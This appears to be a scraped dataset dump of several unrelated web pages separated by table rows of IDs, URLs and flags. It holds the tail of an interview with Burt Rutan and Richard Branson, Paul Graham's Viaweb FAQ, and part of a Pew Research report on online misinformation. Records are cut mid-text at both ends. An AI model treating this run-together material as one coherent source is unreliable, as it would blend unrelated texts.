Adams’s death stayed with Burt, he says, even when he left the air force and set up business in a hangar at the Mojave airport, designing prototype planes. “It was just a deserted old second world war training airport in a crummy little desert town. I had a family, which I lost mainly because I was a workaholic.” He says most aerospace engineers work on an average of two-and-a-half planes during their whole careers. He was building one every year, “without ever injuring a test pilot. You can’t have more fun than a first flight when you find out if your friend lives or dies flying it. And I flew six first flights myself. With a tiny crew of three dozen people who worked their asses off.”
He says you won’t find his inventions in the big airliners – the Boeings and Airbuses. They’re overly risk-averse and conservative, which is why their planes look identical. But the private jet companies have embraced his creations – planes such as the Beech Starship. And throughout it all he brooded over the death of Mike Adams and wondered how he might invent “carefree re-entry”.
He says there was no great Eureka moment with his shuttlecock idea. But one day he felt confident enough to approach Paul Allen and say, “ ‘I would now put my own money into it if I had the money.’ And he put out his hand and we had a handshake. That was the extent of the begging for money I did for SpaceShipOne. He gave me several million dollars and said, ‘Here. Get going.’”
“What’s Paul Allen like?” I ask.
“Opposite of Sir Richard,” Burt replies. “I could call Sir Richard while he’s sleeping at home in Necker island and chat with him. We debate global warming fraud all the time.”
“Hang on,” I say. “Which of you thinks it’s a fraud?”
“He thinks it exists; I think it stopped 17 years ago,” Rutan replies. “Anyway. Paul Allen’s own people can’t just walk into his office. They schedule a meeting a couple of weeks in advance. On the few occasions I was alone with Paul, his own people would rush up to me and go, ‘What did he *say*?’ But if he says something, everybody listens, because it’s an important thing to be said.”
Between 2001 and 2003, SpaceShipOne was a covert endeavour. Nobody outside Burt’s weather-beaten hangar knew they were “developing all the elements of an entire manned space programme. We developed the launch airplane, the White Knight. We developed our own rocket engine, and a rocket test facility, and the navigation system that the pilot looks at to steer it into space. We built a simulator. And, of course, we built SpaceShipOne and trained the astronauts. In 2004, we flew three of the entire world’s five space flights – funded not by a government but by a billionaire who made software. This private little thing. Later, people said I must have had help from Nasa. I didn’t want Nasa to know. And they didn’t.”
Since then, Rutan says, history has proved his shuttlecock mechanism to be foolproof. “People told me it would go into an unrecoverable flat spin, but I knew in my gut it would work. And it worked perfectly the first time and every time. It has never had to be tweaked or modified. Which is crazy, because it’s so bizarre.”
Any delays these past 10 years, he says, have been due to the complexity of the rocket motor design and the fact that Virgin Galactic is full of “smart people” – by which he means committees: interior design committees, PR committees, safety committees. He sounds a bit rueful about this, like if they had listened to him, it could all have gone a lot faster.
He doesn’t mention the accident. I’m not relishing asking him about it, because I’m sure it was the worst day of his life, but when I do, he immediately says, “Sure, I’ll talk about that.”
He won’t go into its cause much – only that it was a “very routine” test that fell victim to “a combination of some very unusual things”. He pauses. “All of us would be bolt upright at two in the morning for a while after that.” And even though he was 220 miles from the explosion, the shock almost killed him, too. “My health deteriorated to where I could almost not walk. I just seemed to get weaker and weaker every day.” He says that if I saw pictures from the unveiling of SpaceShipTwo at the Museum of Natural History in New York that following January, I’d see a man “incapable of walking up three or four steps”. (I do see those pictures later and he does looks terrible.) Eventually his condition was diagnosed as constrictive pericarditis – a hardening of the sac around the heart. He says that as an engineer he can’t bring himself to believe that the stress of the accident hardened a membrane: “That wouldn’t make sense.” But his wife is convinced of it.
At the end of our conversation, Rutan suddenly says, “If there’s an industrial accident at a corporation and three people are killed and three people are seriously injured, how often is there a lawsuit where the families sue the company?”
“Almost every time,” I say.
“There was none,” he says. “There was none. We wrapped ourselves in the families. We told them the truth from the start. None of them sued us. Each of those families is a friend of the company. And that has a lot to say about something that I’m most proud of in my career, and that is how to run a business from an ethical standpoint.”
Later, I look at the memorial website for one of the men who died, Eric Dean Blackwell. It is maintained by his wife, Kim. At the bottom there’s a link to Virgin Galactic, so people can read updates on how the programme is progressing.
Back in Mojave, I’d mentioned to Branson that 10 years earlier I’d read the critical Tom Bower biography, Branson, and that when I later asked Bower if he had anything good to say about Branson, he replied, “No.”
“Oh, he’s forecast our financial demise,” Branson replied. “The thing is, he got a bit lucky with Robert Maxwell and everyone he’s done since then he thinks is in Robert Maxwell’s clothing.”
Last month, there was a flurry of Tom Bower activity. He’s written a new book, Branson: Behind The Mask, in which he claims that Virgin Galactic is a “white elephant” with no licence to fly into space and no rocket powerful enough to take passengers anyway. I email Branson’s people. They reply with a statement that the rocket motor has “burned for full duration and thrust multiple times” during tests, and that they expect to receive the full licence “well in advance of commercial service. Richard,” they say, “remains extremely confident of a 2014 launch.”
Branson hopes that his future astronauts’ five weightless minutes will be only the beginning, and that “suborbital point-to-point travel” is next. This means a journey on SpaceShipTwo that will actually go somewhere, and not just up and down. They could fly from London to Australia in two-and-a-half hours, Branson tells me. And then there are the satellites. “We can put up 15,000 satellites over a six-month period,” he said, “which is more than there are up in the air today. For the three billion people who are in the poverty trap, they’re likely to get access to mobiles and internet for a fraction of what it now costs.”
And this, Branson insists, is imminent. A test flight into space – empty of passengers – will happen in the next few months (Virgin are vague on the details). And the first six astronauts, including Branson and his children, Sam and Holly, should be up later this year. The inaugural flight will be televised live by NBC. The TV company has put out a press statement about it: “Without a doubt, Sir Richard and his children taking the first commercial flight into space will go down in history as one of the most memorable events on television.”
Branson told me back in Mojave that his “eyes are open” about making his family the guinea pigs. “Everybody who signs up knows this is the birth of a new space programme and understands the risks that go with that,” he said. Then he paused. “But every person wants to go on the first flight.”
|
10,433,050 | http://paultyma.blogspot.com/2015/10/how-artificial-intelligence-will-really.html | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
1,949,751 | http://www.khanacademy.org/#Venture%20Capital%20and%20Capital%20Markets | Khan Academy | null | null | true | true | false | null | 2024-10-12 00:00:00 | 2024-10-11 00:00:00 | null | null | null | null | null | null |
17,274,397 | https://fastjs.link | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
7,463,937 | http://expandedconsciousness.com/2014/03/25/anti-gravity-ball-by-mit-opens-new-dimensions/ | null | null | null | true | true | false | null | 2024-10-12 00:00:00 | null | null | null | null | null | null | null |
11,303,366 | https://medium.com/zargethq-stories/rip-session-recording-d1c739375c0e#.fj413xije | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
37,920 | http://www.paulgraham.com/vwfaq.html | Viaweb FAQ | null | | |
**How did the editor handle client sessions?**
There was one Lisp process for each user. When someone logged
in to edit their site, we'd start up a new process and load all
their data into memory. From that point they had an ongoing
conversation with that process.
Because everything was already loaded into memory, we never
had to read anything from disk or start up a process to
respond to an HTTP request. All we had to do was evaluate
a closure stored in memory.
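A minimal sketch of that arrangement — written here in Python rather than the Common Lisp the system actually used, with hypothetical names throughout — looks something like this:

```python
# Hypothetical sketch (not Viaweb's code): one in-memory session per
# logged-in user, so requests never have to touch the disk.
sessions = {}  # user id -> all of that user's site data, held in memory

def log_in(user_id, read_site_from_disk):
    # Done once at login: load everything into memory, much like starting
    # a dedicated per-user process.
    sessions[user_id] = read_site_from_disk(user_id)

def handle_request(user_id, page):
    # No disk reads and no process startup per request; just consult the
    # data already in memory and generate a response.
    site = sessions[user_id]
    return f"<html><body>{page}: {len(site)} objects</body></html>"
```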
**What did you use for an HTTP server?**
At first the editor had its own HTTP server, written in Common Lisp
by Robert Morris. Later we switched to a version of
Apache that he hacked to talk to Lisp.
**What Lisp did you use?**
Clisp.
**Did you use real continuations to save state?**
No, we used macros to fake them in Common Lisp, as described in
On Lisp.
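The macros in On Lisp get their effect by rewriting code into continuation-passing style; the observable result — remembering “what happens next” between HTTP requests — can be imitated with plain closures. The following is a hypothetical Python illustration of that effect, not the macro technique itself:

```python
import uuid

# Hypothetical sketch: fake a continuation by storing the rest of the
# interaction as a closure, keyed by a token embedded in the generated page.
pending = {}  # token -> closure to call when the next request arrives

def ask(question, on_answer):
    # Render a form and remember what to do with the answer.
    token = uuid.uuid4().hex
    pending[token] = on_answer
    return f'<form action="/k/{token}"><p>{question}</p><input name="a"></form>'

def resume(token, answer):
    # The next HTTP request picks up exactly where the last one left off.
    return pending.pop(token)(answer)

# The lambda captures its surroundings, playing the role of the continuation.
page = ask("Name your store:", lambda name: f"<p>Created store {name}.</p>")
```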
**What database did you use?**
We didn't use one. We just stored everything in files.
The Unix file system is pretty good at not losing your data,
especially if you put the files on a Netapp.
It is a common mistake to think of Web-based apps as interfaces to databases.
Desktop apps aren't just interfaces to databases; why should Web-based apps
be any different? The hard part is not where you store the data, but
what the software does.
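As a rough illustration of the files-instead-of-a-database approach — hypothetical Python, not anything Viaweb shipped — per-user data can simply be serialized to a directory and read back on login:

```python
import json
from pathlib import Path

# Hypothetical sketch: keep each user's data in a plain file and let the
# file system (for example one backed by a Netapp) do the work a database
# would otherwise do.
DATA_DIR = Path("users")

def save_site(user_id, site):
    DATA_DIR.mkdir(exist_ok=True)
    path = DATA_DIR / f"{user_id}.json"
    tmp = path.with_suffix(".tmp")
    tmp.write_text(json.dumps(site))
    tmp.replace(path)  # atomic rename, so a crash never leaves half a file

def load_site(user_id):
    return json.loads((DATA_DIR / f"{user_id}.json").read_text())
```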
While we were doing Viaweb, we took a good
deal of heat from pseudo-technical people like VCs and industry
analysts for not using a database-- and for using cheap Intel
boxes running FreeBSD as servers. But when we were getting
bought by Yahoo, we found that they also just stored everything
in files-- and all their servers were also cheap Intel boxes
running FreeBSD.
(During the Bubble, Oracle used to run ads saying that Yahoo
ran on Oracle software. I found this hard to believe, so I asked around.
It turned out the Yahoo *accounting* department used Oracle.)
**Was your co-founder the same Robert Morris who wrote the worm
and is now a professor at MIT?**
Yes.
**Where did you get venture funding?**
We got money from several private investors, what are known in the
business as "angels." Our investors were pretty serious,
almost VCs, but they weren't actually brand-name VC firms.
We did Viaweb very cheaply. We spent a total of about $2 million.
We were just about breaking even when we got bought, so we
would not have spent too much more.
**How was "Viaweb" pronounced?**
The official policy was that you could say either vee-a-web or
vie-a-web. We all used the former, but everyone else, including
the people at Yahoo, seemed to prefer the latter.
**What would you do differently?**
Technically, not much. I think the main thing we should have done
that we didn't was start some kind of online store ourselves. We
used the editor to make our own site, so we were pretty motivated
to make it good. But we could only understand the e-commerce
part of the software second-hand.
|
| | true | true | true | null | 2024-10-12 00:00:00 | null | null | null | null | null | null | null |
15,546,928 | http://www.pewinternet.org/2017/10/19/the-future-of-truth-and-misinformation-online/ | The Future of Truth and Misinformation Online | Janna Anderson; Lee Rainie | In late 2016, Oxford Dictionaries selected “post-truth” as the word of the year, defining it as “relating to or denoting circumstances in which objective facts are less influential in shaping public opinion than appeals to emotion and personal belief.”
The 2016 Brexit vote in the United Kingdom and the tumultuous U.S. presidential election highlighted how the digital age has affected news and cultural narratives. New information platforms feed the ancient instinct people have to find information that syncs with their perspectives: A 2016 study that analyzed 376 million Facebook users’ interactions with over 900 news outlets found that people tend to seek information that aligns with their views.
This makes many vulnerable to accepting and acting on misinformation. For instance, after fake news stories in June 2017 reported that Ethereum’s founder Vitalik Buterin had died in a car crash, its market value reportedly dropped by $4 billion.
When BBC Future Now interviewed a panel of 50 experts in early 2017 about the “grand challenges we face in the 21st century,” many named the breakdown of trusted information sources. “The major new challenge in reporting news is the new shape of truth,” said Kevin Kelly, co-founder of Wired magazine. “Truth is no longer dictated by authorities, but is networked by peers. For every fact there is a counterfact and all these counterfacts and facts look identical online, which is confusing to most people.”
Americans worry about that: A Pew Research Center study conducted just after the 2016 election found 64% of adults believe fake news stories cause a great deal of confusion and 23% said they had shared fabricated political stories themselves – sometimes by mistake and sometimes intentionally.
The question arises, then: What will happen to the online information environment in the coming decade? In summer 2017, Pew Research Center and Elon University’s Imagining the Internet Center conducted a large canvassing of technologists, scholars, practitioners, strategic thinkers and others, asking them to react to this framing of the issue:
*The rise of “fake news” and the proliferation of doctored narratives that are spread by humans and bots online are challenging publishers and platforms. Those trying to stop the spread of false information are working to design technical and human systems that can weed it out and minimize the ways in which bots and other schemes spread lies and misinformation.*
*The question: In the next 10 years, will trusted methods emerge to block false narratives and allow the most accurate information to prevail in the overall information ecosystem? Or will the quality and veracity of information online deteriorate due to the spread of unreliable, sometimes even dangerous, socially destabilizing ideas?*
Respondents were then asked to choose one of the following answer options:
The information environment **will improve** – In the next 10 years, on balance, the information environment will be IMPROVED by changes that reduce the spread of lies and other misinformation online.
The information environment **will NOT improve** – In the next 10 years, on balance, the information environment will NOT BE improved by changes designed to reduce the spread of lies and other misinformation online.
Some 1,116 responded to this nonscientific canvassing: **51%** chose the option that the information environment will not improve, and **49%** said the information environment will improve. (See “About this canvassing of experts” for details about this sample.) Participants were next asked to explain their answers. This report concentrates on these follow-up responses.
Their reasoning revealed a wide range of opinions about the nature of these threats and the most likely solutions required to resolve them. But the overarching and competing themes were clear: Those who do not think things will improve felt that humans mostly shape technology advances to their own, not-fully-noble purposes and that bad actors with bad motives will thwart the best efforts of technology innovators to remedy today’s problems.
And those who are most hopeful believed that technological fixes can be implemented to bring out the better angels guiding human nature.
More specifically, the 51% of these experts who expect things will *not improve* generally cited two reasons:
**The fake news ecosystem preys on some of our deepest human instincts:** Respondents said humans’ primal quest for success and power – their “survival” instinct – will continue to degrade the online information environment in the next decade. They predicted that manipulative actors will use new digital tools to take advantage of humans’ inbred preference for comfort and convenience and their craving for the answers they find in reinforcing echo chambers.
**Our brains are not wired to contend with the pace of technological change:** These respondents said the rising speed, reach and efficiencies of the internet and emerging online applications will magnify these human tendencies and that technology-based solutions will not be able to overcome them. They predicted a future information landscape in which fake information crowds out reliable information. Some even foresaw a world in which widespread information scams and mass manipulation cause broad swathes of public to simply give up on being informed participants in civic life.
The 49% of these experts who expect things to *improve* generally inverted that reasoning:
**Technology can help fix these problems:** These more hopeful experts said the rising speed, reach and efficiencies of the internet, apps and platforms can be harnessed to rein in fake news and misinformation campaigns. Some predicted better methods will arise to create and promote trusted, fact-based news sources.
**It is also human nature to come together and fix problems:** The hopeful experts in this canvassing took the view that people have always adapted to change and that this current wave of challenges will also be overcome. They noted that misinformation and bad actors have always existed but have eventually been marginalized by smart people and processes. They expect well-meaning actors will work together to find ways to enhance the information environment. They also believe better information literacy among citizens will enable people to judge the veracity of material content and eventually raise the tone of discourse.
The majority of participants in this canvassing wrote detailed elaborations on their views. Some chose to have their names connected to their answers; others opted to respond anonymously. These findings do not represent all possible points of view, but they do reveal a wide range of striking observations.
Respondents collectively articulated several major themes tied to those insights; they are explained in the sections below. Several longer additional sets of responses tied to these themes follow that summary.
The following section presents an overview of the themes found among the written responses, including a small selection of representative quotes supporting each point. Some comments are lightly edited for style or length.
### Theme 1: The information environment will not improve: The problem is human nature
Most respondents who expect the environment to worsen said human nature is at fault. For instance, **Christian H. Huitema**, former president of the Internet Architecture Board, commented, “The quality of information will not improve in the coming years, because technology can’t improve human nature all that much.”
These experts predicted that the problem of misinformation will be amplified because the worst side of human nature is magnified by bad actors using advanced online tools at internet speed on a vast scale.
**Tom Rosenstiel**, author, director of the American Press Institute and senior fellow at the Brookings Institution, commented, “Whatever changes platform companies make, and whatever innovations fact checkers and other journalists put in place, those who want to deceive will adapt to them. Misinformation is not like a plumbing problem you fix. It is a social condition, like crime, that you must constantly monitor and adjust to. Since as far back as the era of radio and before, as Winston Churchill said, ‘A lie can go around the world before the truth gets its pants on.’”
**Michael J. Oghia**, an author, editor and journalist based in Europe, said he expects a worsening of the information environment due to five things: “1) The spread of misinformation and hate; 2) Inflammation, sociocultural conflict and violence; 3) The breakdown of socially accepted/agreed-upon knowledge and what constitutes ‘fact.’ 4) A new digital divide of those subscribed (and ultimately controlled) by misinformation and those who are ‘enlightened’ by information based on reason, logic, scientific inquiry and critical thinking. 5) Further divides between communities, so that as we are more connected we are farther apart. And many others.”
**Leah Lievrouw**, professor in the department of information studies at the University of California, Los Angeles, observed, “So many players and interests see online information as a uniquely powerful shaper of individual action and public opinion in ways that serve their economic or political interests (marketing, politics, education, scientific controversies, community identity and solidarity, behavioral ‘nudging,’ etc.). These very diverse players would likely oppose (or try to subvert) technological or policy interventions or other attempts to insure the quality, and especially the disinterestedness, of information.”
#### Subtheme: More people = more problems. The internet’s continuous growth and accelerating innovation allow more people and artificial intelligence (AI) to create and instantly spread manipulative narratives
While propaganda and the manipulation of the public via falsehoods is a tactic as old as the human race, many of these experts predicted that the speed, reach and low cost of online communication plus continuously emerging innovations will magnify the threat level significantly. A **professor at a Washington, D.C.-area university** said, “It is nearly impossible to implement solutions at scale – the attack surface is too large to be defended successfully.”
**Jerry Michalski,** futurist and founder of REX, replied, “The trustworthiness of our information environment will decrease over the next decade because: 1) It is inexpensive and easy for bad actors to act badly; 2) Potential technical solutions based on strong ID and public voting (for example) won’t quite solve the problem; and 3) real solutions based on actual trusted relationships will take time to evolve – likely more than a decade.”
An **institute director and university professor** said, “The internet is the 21st century’s threat of a ‘nuclear winter,’ and there’s no equivalent international framework for nonproliferation or disarmament. The public can grasp the destructive power of nuclear weapons in a way they will never understand the utterly corrosive power of the internet to civilized society, when there is no reliable mechanism for sorting out what people can believe to be true or false.”
**Bob Frankston**, internet pioneer and software innovator, said, “I always thought that ‘Mein Kampf’ could be countered with enough information. Now I feel that people will tend to look for confirmation of their biases and the radical transparency will not shine a cleansing light.”
**David Harries**, associate executive director for Foresight Canada, replied, “More and more, history is being written, rewritten and corrected, because more and more people have the ways and means to do so. Therefore there is ever more information that competes for attention, for credibility and for influence. The competition will complicate and intensify the search for veracity. Of course, many are less interested in veracity than in winning the competition.”
**Glenn Edens**, CTO for technology reserve at PARC, a Xerox company, commented, “Misinformation is a two-way street. Producers have an easy publishing platform to reach wide audiences and those audiences are flocking to the sources. The audiences typically are looking for information that fits their belief systems, so it is a really tough problem.”
#### Subtheme: Humans are by nature selfish, tribal, gullible convenience seekers who put the most trust in that which seems familiar
The respondents who supported this view noted that people’s actions – from consciously malevolent and power-seeking behaviors to seemingly more benign acts undertaken for comfort or convenience – will work to undermine a healthy information environment.
An **executive consultant based in North America** wrote, “It comes down to motivation: There is no market for the truth. The public isn’t motivated to seek out verified, vetted information. They are happy hearing what confirms their views. And people can gain more creating fake information (both monetary and in notoriety) than they can keeping it from occurring.”
**Serge Marelli**, an IT professional who works on and with the Net, wrote, “As a group, humans are ‘stupid.’ It is ‘group mind’ or a ‘group phenomenon’ or, as George Carlin said, ‘Never underestimate the power of stupid people in large groups.’ Then, you have Kierkegaard, who said, ‘People demand freedom of speech as a compensation for the freedom of thought which they seldom use.’ And finally, Euripides said, ‘Talk sense to a fool and he calls you foolish.’”
**Starr Roxanne Hiltz**, distinguished professor of information systems and co-author of the visionary 1970s book “The Network Nation,” replied, “People on systems like Facebook are increasingly forming into ‘echo chambers’ of those who think alike. They will keep unfriending those who don’t, and passing on rumors and fake news that agrees with their point of view. When the president of the U.S. frequently attacks the traditional media and anybody who does not agree with his ‘alternative facts,’ it is not good news for an uptick in reliable and trustworthy facts circulating in social media.”
**Nigel Cameron**, a technology and futures editor and president of the Center for Policy on Emerging Technologies, said, “Human nature is not EVER going to change (though it may, of course, be manipulated). And the political environment is bad.”
**Ian O’Byrne**, assistant professor at the College of Charleston, replied, “Human nature will take over as the salacious is often sexier than facts. There are multiple information streams, public and private, that spread this information online. We can also not trust the businesses and industries that develop and facilitate these digital texts and tools to make changes that will significantly improve the situation.”
**Greg Swanson**, media consultant with ITZonTarget, noted, “The sorting of reliable versus fake news requires a trusted referee. It seems unlikely that government can play a meaningful role as this referee. We are too polarized. And we have come to see the television news teams as representing divergent points of view, and, depending on your politics, the network that does not represent your views is guilty of ‘fake news.’ It is hard to imagine a fair referee that would be universally trusted.”
There were also those among these expert respondents who said inequities, perceived and real, are at the root of much of the misinformation being produced.
A **professor at MIT** observed, “I see this as a problem with a socioeconomic cure: Greater equity and justice will achieve much more than a bot war over facts. Controlling ‘noise’ is less a technological problem than a human problem, a problem of belief, of ideology. Profound levels of ungrounded beliefs about things both sacred and profane existed before the branding of ‘fake news.’ Belief systems – not ‘truths’ – help to cement identities, forge relationships, explain the unexplainable.”
**Julian Sefton-Green**, professor of new media education at Deakin University in Australia, said, “The information environment is an extension of social and political tensions. It is impossible to make the information environment a rational, disinterested space; it will always be susceptible to pressure.”
A **respondent affiliated with Harvard University’s Berkman Klein Center for Internet & Society** wrote, “The democratization of publication and consumption that the networked sphere represents is too expansive for there to be any meaningful improvement possible in terms of controlling or labeling information. People will continue to cosset their own cognitive biases.”
#### Subtheme: In existing economic, political and social systems, the powerful corporate and government leaders most able to improve the information environment profit most when it is in turmoil
A large number of respondents said the interests of the most highly motivated actors, including those in the worlds of business and politics, are generally not motivated to “fix” the proliferation of misinformation. Those players will be a key driver in the worsening of the information environment in the coming years and/or the lack of any serious attempts to effectively mitigate the problem.
**Scott Shamp**, a dean at Florida State University, commented, “Too many groups gain power through the proliferation of inaccurate or misleading information. When there is value in misinformation, it will rule.”
**Stephen Downes**, researcher with the National Research Council of Canada, wrote, “Things will not improve. There is too much incentive to spread disinformation, fake news, malware and the rest. Governments and organizations are major actors in this space.”
An **anonymous respondent** said, “Actors can benefit socially, economically, politically by manipulating the information environment. As long as these incentives exist, actors will find a way to exploit them. These benefits are not amenable to technological resolution as they are social, political and cultural in nature. Solving this problem will require larger changes in society.”
**Seth Finkelstein**, consulting programmer and winner of the Electronic Freedom Foundation’s Pioneer Award, commented, “Virtually all the structural incentives to spread misinformation seem to be getting worse.”
A **data scientist based in Europe** wrote, “The information environment is built on the top of telecommunication infrastructures and services developed following the free-market ideology, where ‘truth’ or ‘fact’ are only useful as long as they can be commodified as market products.”
**Zbigniew Łukasiak**, a business leader based in Europe, wrote, “Big political players have just learned how to play this game. I don’t think they will put much effort into eliminating it.”
A **vice president for public policy at one of the world’s foremost entertainment and media companies** commented, “The small number of dominant online platforms do not have the skills or ethical center in place to build responsible systems, technical or procedural. They eschew accountability for the impact of their inventions on society and have not developed any of the principles or practices that can deal with the complex issues. They are like biomedical or nuclear technology firms absent any ethics rules or ethics training or philosophy. Worse, their active philosophy is that assessing and responding to likely or potential negative impacts of their inventions is both not theirs to do and even shouldn’t be done.”
**Patricia Aufderheide**, professor of communications and founder of the Center for Media and Social Impact at American University, said, “Major interests are not invested enough in reliability to create new business models and political and regulatory standards needed for the shift. … Overall there are powerful forces, including corporate investment in surveillance-based business models, that create many incentives for unreliability, ‘invisible handshake’ agreements with governments that militate against changing surveillance models, international espionage at a governmental and corporate level in conjunction with mediocre cryptography and poor use of white hat hackers, poor educational standards in major industrial countries such as the U.S., and fundamental weaknesses in the U.S. political/electoral system that encourage exploitation of unreliability. It would be wonderful to believe otherwise, and I hope that other commentators will be able to convince me otherwise.”
**James Schlaffer**, an assistant professor of economics, commented, “Information is curated by people who have taken a step away from the objectivity that was the watchword of journalism. Conflict sells, especially to the opposition party, therefore the opposition news agency will be incentivized to push a narrative and agenda. Any safeguards will appear as a way to further control narrative and propagandize the population.”
#### Subtheme: Human tendencies and infoglut drive people apart and make it harder for them to agree on “common knowledge.” That makes healthy debate difficult and destabilizes trust. The fading of news media contributes to the problem
Many respondents expressed concerns about how people’s struggles to find and apply accurate information contribute to a larger social and political problem: There is a growing deficit in commonly accepted facts or some sort of cultural “common ground.” Why has this happened? They cited several reasons:
- Online echo chambers or silos divide people into separate camps, at times even inciting them to express anger and hatred at a volume not seen in previous communications forms.
- Information overload crushes people’s attention spans. Their coping mechanism is to turn to entertainment or other lighter fare.
- High-quality journalism has been decimated due to changes in the attention economy.
They said these factors and others make it difficult for many people in the digital age to create and come to share the type of “common knowledge” that undergirds better and more-responsive public policy. A share of respondents said a lack of commonly shared knowledge leads many in society to doubt the reliability of everything, causing them to simply drop out of civic participation, depleting the number of active and informed citizens.
**Jamais Cascio**, distinguished fellow at the Institute for the Future, noted, “The power and diversity of very low-cost technologies allowing unsophisticated users to create believable ‘alternative facts’ is increasing rapidly. It’s important to note that the goal of these tools is not necessarily to create consistent and believable alternative facts, but to create plausible levels of doubt in actual facts. The crisis we face about ‘truth’ and reliable facts is predicated less on the ability to get people to believe the *wrong* thing as it is on the ability to get people to *doubt* the right thing. The success of Donald Trump will be a flaming signal that this strategy works, alongside the variety of technologies now in development (and early deployment) that can exacerbate this problem. In short, it’s a successful strategy, made simpler by more powerful information technologies.”
**Philip J. Nickel**, lecturer at Eindhoven University of Technology in the Netherlands, said, “The decline of traditional news media and the persistence of closed social networks will not change in the next 10 years. These are the main causes of the deterioration of a public domain of shared facts as the basis for discourse and political debate.”
**Kenneth Sherrill**, professor emeritus of political science at Hunter College, City University of New York, predicted, “Disseminating false rumors and reports will become easier. The proliferation of sources will increase the number of people who don’t know who or what they trust. These people will drop out of the normal flow of information. Participation will decline as more and more citizens become unwilling/unable to figure out which information sources are reliable.”
What is truth? What is a fact? Who gets to decide? And can most people agree to trust anything as “common knowledge”? A number of respondents challenged the idea that any individuals, groups or technology systems could or should “rate” information as credible, factual, true or not.
An **anonymous respondent** observed, “Whatever is devised will not be seen as impartial; some things are not black and white; for other situations, facts brought up to come to a conclusion are different that other facts used by others in a situation. Each can have real facts, but it is the facts that are gathered that matter in coming to a conclusion; who will determine what facts will be considered or what is even considered a fact.”
A **research assistant at MIT** noted, “‘Fake’ and ‘true’ are not as binary as we would like, and – combined with an increasingly connected and complex digital society – it’s a challenge to manage the complexity of social media without prescribing a narrative as ‘truth.’”
An **internet pioneer and longtime leader at ICANN** said, “There is little prospect of a forcing factor that will emerge that will improve the ‘truthfulness’ of information in the internet.”
A **vice president for stakeholder engagement** said, “Trust networks are best established with physical and unstructured interaction, discussion and observation. Technology is reducing opportunities for such interactions and disrupting human discourse, while giving the ‘feeling’ that we are communicating more than ever.”
#### Subtheme: A small segment of society will find, use and perhaps pay a premium for information from reliable sources. Outside of this group “chaos will reign” and a worsening digital divide will develop
Some respondents predicted that a larger digital divide will form. Those who pursue more-accurate information and rely on better-informed sources will separate from those who are not selective enough or who do not invest either the time or the money in doing so.
**Alejandro Pisanty**, a professor at UNAM, the National University of Mexico, and longtime internet policy leader, observed, “Overall, at least a part of society will value trusted information and find ways to keep a set of curated, quality information resources. This will use a combination of organizational and technological tools but above all, will require a sharpened sense of good judgment and access to diverse, including rivalrous, sources. Outside this, chaos will reign.”
**Alexander Halavais**, associate professor of social technologies at Arizona State University, said, “As there is value in accurate information, the availability of such information will continue to grow. However, when consumers are not directly paying for such accuracy, it will certainly mean a greater degree of misinformation in the public sphere. That means the continuing bifurcation of haves and have-nots, when it comes to trusted news and information.”
An **anonymous editor and publisher** commented, “Sadly, many Americans will not pay attention to ANY content from existing or evolving sources. It’ll be the continuing dumbing down of the masses, although the ‘upper’ cadres (educated/thoughtful) will read/see/know, and continue to battle.”
An **anonymous respondent** said, “There will be a sort of ‘gold standard’ set of sources, and there will be the fringe.”
### Theme 2: The information environment will not improve because technology will create new challenges that can’t or won’t be countered effectively and at scale
Many who see little hope for improvement of the information environment said technology will not save society from distortions, half-truths, lies and weaponized narratives. An **anonymous business leader** argued, “It is too easy to create fake facts, too labor-intensive to check and too easy to fool checking algorithms.” And this response of an anonymous **research scientist based in North America** echoed the view of many participants in this canvassing: “We will develop technologies to help identify false and distorted information, BUT they won’t be good enough.”
**Paul N. Edwards**, Perry Fellow in International Security at Stanford University, commented, “Many excellent methods will be developed to improve the information environment, but the history of online systems shows that bad actors can and will always find ways around them.”
**Vian Bakir**, professor in political communication and journalism at Bangor University in Wales, commented, “It won’t improve because of 1) the evolving nature of technology – emergent media always catches out those who wish to control it, at least in the initial phase of emergence; 2) online social media and search engine business models favour misinformation spreading; 3) well-resourced propagandists exploit this mix.”
Many who expect things will not improve in the next decade said that “white hat” efforts will never keep up with “black hat” advances in information wars. A **user-experience and interaction designer** said, “As existing channels become more regulated, new unregulated channels will continue to emerge.”
#### Subtheme: Those generally acting for themselves and not the public good have the advantage, and they are likely to stay ahead in the information wars
Many of those who expect no improvement of the information environment said those who wish to spread misinformation are highly motivated to use innovative tricks to stay ahead of the methods meant to stop them. They said certain actors in government, business and other individuals with propaganda agendas are highly driven to make technology work in their favor in the spread of misinformation, and there will continue to be more of them.
A number of respondents referred to this as an “arms race.” **David Sarokin** of Sarokin Consulting and author of “Missed Information,” said, “There will be an arms race between reliable and unreliable information.” And **David Conrad**, a chief technology officer, replied, “In the arms race between those who want to falsify information and those who want to produce accurate information, the former will always have an advantage.”
**Jim Hendler**, professor of computing sciences at Rensselaer Polytechnic Institute, commented, “The information environment will continue to change but the pressures of politics, advertising and stock-return-based capitalism rewards those who find ways to manipulate the system, so it will be a constant battle between those aiming for ‘objectiveness’ and those trying to manipulate the system.”
**John Markoff**, retired journalist and former technology reporter for The New York Times, said, “I am extremely skeptical about improvements related to verification without a solution to the challenge of anonymity on the internet. I also don’t believe there will be a solution to the anonymity problem in the near future.”
**Scott Spangler**, principal data scientist at IBM Watson Health, said technologies now exist that make fake information almost impossible to discern and flag, filter or block. He wrote, “Machine learning and sophisticated statistical techniques will be used to accurately simulate real information content and make fake information almost indistinguishable from the real thing.”
**Jason Hong**, associate professor at the School of Computer Science at Carnegie Mellon University, said, “Some fake information will be detectable and blockable, but the vast majority won’t. The problem is that it’s *still* very hard for computer systems to analyze text, find assertions made in the text and crosscheck them. There’s also the issue of subtle nuances or differences of opinion or interpretation. Lastly, the incentives are all wrong. There are a lot of rich and unethical people, politicians, non-state actors and state actors who are strongly incentivized to get fake information out there to serve their selfish purposes.”
A **research professor of robotics at Carnegie Mellon University** observed, “Defensive innovation is always behind offensive innovation. Those wanting to spread misinformation will always be able to find ways to circumvent whatever controls are put in place.”
A **research scientist for the Computer Science and Artificial Intelligence Laboratory at MIT** said, “Problems will get worse faster than solutions can address, but that only means solutions are more needed than ever.”
#### Subtheme: Weaponized narratives and other false content will be magnified by social media, online filter bubbles and AI
Some respondents expect a dramatic rise in the manipulation of the information environment by nation-states, by individual political actors and by groups wishing to spread propaganda. Their purpose is to raise fears that serve their agendas, create or deepen silos and echo chambers, divide people and set them upon each other, and paralyze or confuse public understanding of the political, social and economic landscape.
